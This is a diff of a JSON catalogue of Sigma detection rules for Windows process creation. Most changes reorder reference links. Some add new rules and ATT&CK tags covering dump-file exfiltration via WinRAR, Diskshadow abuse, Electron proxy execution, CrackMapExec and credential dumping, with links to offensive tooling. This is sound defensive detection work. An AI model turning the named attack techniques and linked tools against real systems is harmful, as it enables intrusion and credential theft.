@@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", + "https://twitter.com/0gtweet/status/1674399582162153472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml" ], "tags": [ @@ -52712,9 +53431,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml" ], @@ -52744,6 +53463,40 @@ "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", "value": "HackTool - Potential Impacket Lateral Movement Activity" }, + { + "description": "Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2022/01/04", + "falsepositive": [ + "Legitimate use of WinRAR with a command line in which \".dmp\" or \".dump\" appears accidentally", + "Legitimate use of WinRAR to compress WER \".dmp\" files for troubleshooting" + ], + "filename": "proc_creation_win_winrar_exfil_dmp_files.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "value": "Winrar Compressing Dump Files" + }, { "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", "meta": { @@ -52757,8 +53510,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml" ], @@ -52812,6 +53565,45 @@ "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "value": "Suspicious CMD Shell Output Redirect" }, + { + "description": "Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/15", + "falsepositive": [ + "False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs." + ], + "filename": "proc_creation_win_diskshadow_script_mode_susp_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", + "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "fa1a7e52-3d02-435b-81b8-00da14dd66c1", + "value": "Diskshadow Script Mode - Execution From Potential Suspicious Location" + }, { "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", "meta": { @@ -52904,9 +53696,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/electron/rcedit", - "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", + "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", + "https://github.com/electron/rcedit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml" ], "tags": [ @@ -52965,8 +53757,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], "tags": [ @@ -53068,8 +53860,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -53341,8 +54134,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://attack.mitre.org/software/S0108/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml" ], "tags": [ @@ -53422,9 +54215,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/nas_bench/status/1534916659676422152", "https://twitter.com/nas_bench/status/1534915321856917506", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", - "https://twitter.com/nas_bench/status/1534916659676422152", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml" ], "tags": [ @@ -53649,10 +54442,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1537896324837781506", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://twitter.com/nas_bench/status/1537896324837781506", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" ], "tags": [ @@ -53672,6 +54465,34 @@ "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", "value": "Suspicious Cabinet File Execution Via Msdt.EXE" }, + { + "description": "Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.", + "meta": { + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/05", + "falsepositive": [ + "Legitimate usage for debugging purposes" + ], + "filename": "proc_creation_win_susp_electron_exeuction_proxy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc", + "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", + "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", + "https://lolbas-project.github.io/lolbas/Binaries/Teams/", + "https://positive.security/blog/ms-officecmd-rce", + "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "378a05d8-963c-46c9-bcce-13c7657eac99", + "value": "Potentially Suspicious Electron Application CommandLine" + }, { "description": "Detects command line parameters used by Hydra password guessing hack tool", "meta": { @@ -53770,8 +54591,20 @@ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059" + ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "value": "Suspicious Program Names" }, @@ -53788,8 +54621,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/Dumpert", "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml" ], "tags": [ @@ -53822,9 +54655,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml" ], @@ -54007,9 +54840,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://twitter.com/mattifestation/status/1196390321783025666", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/oulusoyum/status/1191329746069655553", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" ], "tags": [ @@ -54051,9 +54884,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://redcanary.com/threat-detection-report/threats/qbot/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ @@ -54087,8 +54920,8 @@ "logsource.product": "windows", "refs": [ "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" ], "tags": [ @@ -54145,14 +54978,70 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.credential_access", + "attack.discovery", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1110", + "attack.t1201" + ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", "value": "HackTool - CrackMapExec Execution" }, @@ -54169,10 +55058,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://adsecurity.org/?p=2604", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://adsecurity.org/?p=2604", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -54228,8 +55117,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml" ], "tags": [ @@ -54346,8 +55235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml" ], "tags": [ @@ -54397,8 +55286,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml" ], "tags": [ @@ -54431,8 +55320,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml" ], "tags": [ @@ -54465,9 +55354,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://www.gpg4win.de/documentation.html", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml" ], "tags": [ @@ -54717,10 +55606,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/wunderwuzzi23/firefox-cookiemonster", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/defaultnamehere/cookie_crimes/", "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/wunderwuzzi23/firefox-cookiemonster", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml" ], "tags": [ @@ -54753,12 +55642,24 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", "https://twitter.com/0gtweet/status/1474899714290208777?s=12", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery", + "attack.t1082" + ] }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "value": "Suspicious Kernel Dump Using Dtrace" }, @@ -54808,8 +55709,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/blackorbird/status/1140519090961825792", "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" ], "tags": [ @@ -54842,10 +55743,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml" ], "tags": [ @@ -55044,8 +55945,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml" ], "tags": [ @@ -55145,8 +56046,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/RedDrip7/status/1506480588827467785", "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", + "https://twitter.com/RedDrip7/status/1506480588827467785", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml" ], @@ -55180,8 +56081,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml" ], "tags": [ @@ -55323,9 +56224,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://redcanary.com/blog/child-processes/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml" ], "tags": [ @@ -55400,8 +56301,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml" ], "tags": [ @@ -55690,8 +56591,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml" ], "tags": [ @@ -55760,8 +56661,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip_execution.yml" ], "tags": [ @@ -55794,9 +56695,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", - "https://www.php.net/manual/en/features.commandline.php", "https://www.revshells.com/", + "https://www.php.net/manual/en/features.commandline.php", + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ @@ -55888,9 +56789,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", - "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", - "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml" ], "tags": [ @@ -55967,8 +56868,8 @@ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml" ], "tags": [ @@ -56091,8 +56992,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://twitter.com/WindowsDocs/status/1620078135080325122", + "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml" ], "tags": [ @@ -56236,8 +57137,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nsudo.yml" ], "tags": [ @@ -56519,14 +57420,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ @@ -56780,8 +57681,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 